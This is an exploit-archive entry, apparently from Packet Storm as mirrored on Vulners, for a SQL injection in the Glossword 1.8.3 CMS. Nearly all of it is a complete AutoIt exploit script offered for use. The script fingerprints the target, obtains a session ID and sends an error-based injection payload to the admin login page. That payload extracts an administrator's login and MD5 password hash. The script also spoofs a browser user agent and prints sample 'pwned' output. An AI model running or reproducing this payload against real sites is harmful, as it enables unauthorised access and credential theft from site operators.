Lucene search
K

Glossword 1.8.3 SQL Injection

🗓️ 03 Feb 2013 00:00:00Reported by AkastepType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 31 Views

Glossword 1.8.3 SQL Injection vulnerability with exploit detail

Code
`#cs  
==============================================================  
Vulnerable Software: Glossword 1.8.3  
Official site: http://sourceforge.net/projects/glossword/  
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/  
Vuln: SQLi  
==================THIS IS A WHOLE EXPLOIT=====================  
Exploit Coded In AutoIT.  
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.  
Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png  
POC video: http://youtu.be/55IaNTQS3Fk  
  
Exploit usage:  
  
C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2  
  
  
##############################################################  
# Glossword 1.8.3 SQL injection Exploit #  
# Usage: glossa.exe http://site.tld /installdir/ UID (int) #  
# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #  
# VULN/Exploit: AkaStep & HERO_AZE #  
##############################################################  
  
##############################################################  
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]  
##############################################################  
  
##############################################################  
[*] CMS is GLOSSWORD! [*]  
##############################################################  
  
##############################################################  
[*] FETCHING VALID SESSUID [*]  
##############################################################  
  
##############################################################  
[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]  
##############################################################  
  
##############################################################  
[*] !~ P*W*N*E*D ~! [*]  
--------------------------------------------------------------  
[*] Login: admin [*]  
--------------------------------------------------------------  
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]  
--------------------------------------------------------------  
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php  
--------------------------------------------------------------  
[*] Good Luck;) [*]  
##############################################################  
[*] DONE [*]  
##############################################################  
  
  
  
  
#ce  
  
  
#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_Outfile=glossa.exe  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;  
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _  
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _  
'# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _  
@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _  
'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);  
ConsoleWrite(@CRLF & $exploitname & @CRLF)  
  
$method='POST';  
$vulnurl='gw_admin/login.php'  
Global $sessid=0  
$cmsindent='lossword'; # We will use it to identify CMS #;  
$adminpanel=$vulnurl  
  
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;  
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';  
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF  
if $CmdLine[0] <> 3 Then  
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
MsgBox(64,"",$msg_usage);  
exit;  
EndIf  
  
  
if $CmdLine[0]=3 Then  
$targetsite=$CmdLine[1];  
$installdir=$CmdLine[2];  
$uidtoattack=Number(StringMid($CmdLine[3],1,255));  
EndIf  
  
if not StringIsDigit($uidtoattack) Then  
ConsoleWrite(' UID is wrong! Exit' );  
Exit;  
EndIf  
  
  
  
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then  
ConsoleWrite('Are you kidding meeeeen?');  
Exit;  
EndIf  
  
  
HttpSetUserAgent($useragent)  
$doublecheck=InetGet($targetsite,'',1);  
if @error Then  
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)  
Exit;  
EndIf  
  
  
  
sleep(Random(1200,2500,1));  
  
sendfakeretrivevalidsess($targetsite,$installdir)  
  
HttpSetUserAgent($useragent);  
$sidentify=_INetGetSource($targetsite & $adminpanel,True);  
  
Func exploit($targetsite,$installdir,$sessid)  
Global $sAddress = $targetsite  
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _  
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _  
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _  
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";  
Global $sDomain = $targetsite  
Global $sPage = $installdir & $vulnurl  
Global $sAdditionalData = $PAYLOADTOSEND  
Global $hOpen = _WinHttpOpen($useragent)  
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)  
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')  
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)  
_WinHttpReceiveResponse($hRequest)  
Global $sReturned  
If _WinHttpQueryDataAvailable($hRequest) Then  
Do  
$sReturned &= _WinHttpReadData($hRequest)  
Until @error  
  
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then  
  
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)  
For $x = 0 To UBound($zsuxxv) - 1  
Beep(100,1000);  
ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _  
StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _  
_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _  
StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _  
' [*] ' & _  
StringReplace($triptrop,'#','-') & _  
'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _  
'[*] Good Luck;) [*]' & _  
$triptrop & '[*] DONE [*]' & _  
$triptrop);  
Next  
  
Else  
  
ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _  
' [*]' & $triptrop);  
Beep(1500,1000);  
Exit  
  
  
EndIf  
EndIf  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
EndFunc;=> exploit();  
  
  
Func sendfakeretrivevalidsess($targetsite,$installdir)  
  
$fakesessionID='';  
Do  
$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)  
until StringLen($fakesessionID)=32  
  
$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)  
ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop)  
sleep(Random(1000,2500,1))  
$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;  
HttpSetUserAgent($useragent);  
$str=_INetGetSource($rtarget);  
if StringInStr($str,"Session does not exist.") then  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop);  
sleep(Random(1000,2500,1))  
Else  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);  
exit;  
EndIf  
$i=123  
$mystr='';  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)  
sleep(Random(1000,2500,1))  
Do  
$i+=1;  
if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//  
$mystr&=StringMid($str,$i,1)  
until StringInStr($mystr,chr(34));  
  
  
$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)  
if not $sessid =32 Then  
ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop)  
exit;  
Else  
ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop)  
EndIf  
$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')  
exploit($targetsite,$installdir,$sessid)  
EndFunc;=>sendfakeretrivevalidsess();  
  
  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
  
#ce  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation